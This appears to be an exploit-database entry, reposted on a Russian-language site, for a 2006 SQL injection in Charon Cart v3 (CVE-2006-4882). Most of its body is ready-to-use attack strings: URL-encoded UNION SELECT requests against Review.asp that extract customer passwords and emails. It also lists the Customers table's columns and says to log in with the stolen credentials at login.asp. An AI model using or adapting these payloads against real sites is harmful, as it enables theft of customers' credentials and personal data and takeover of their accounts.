- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2387
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2006-4882
- Дата публикации
- 2006-09-17
Код:
Vulnerability Report
*******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.charon.co.uk
# Exploit;
*******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]
Columns;
"""""""""""""""""""""
CustomerID
"""""""""""""""""""""
CustomerEmail
"""""""""""""""""""""
CustomerPassword
"""""""""""""""""""""
ShipCountry
"""""""""""""""""""""
Phone
"""""""""""""""""""""
.........
"""""""""""""""""""""
....
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]- Источник
- www.exploit-db.com
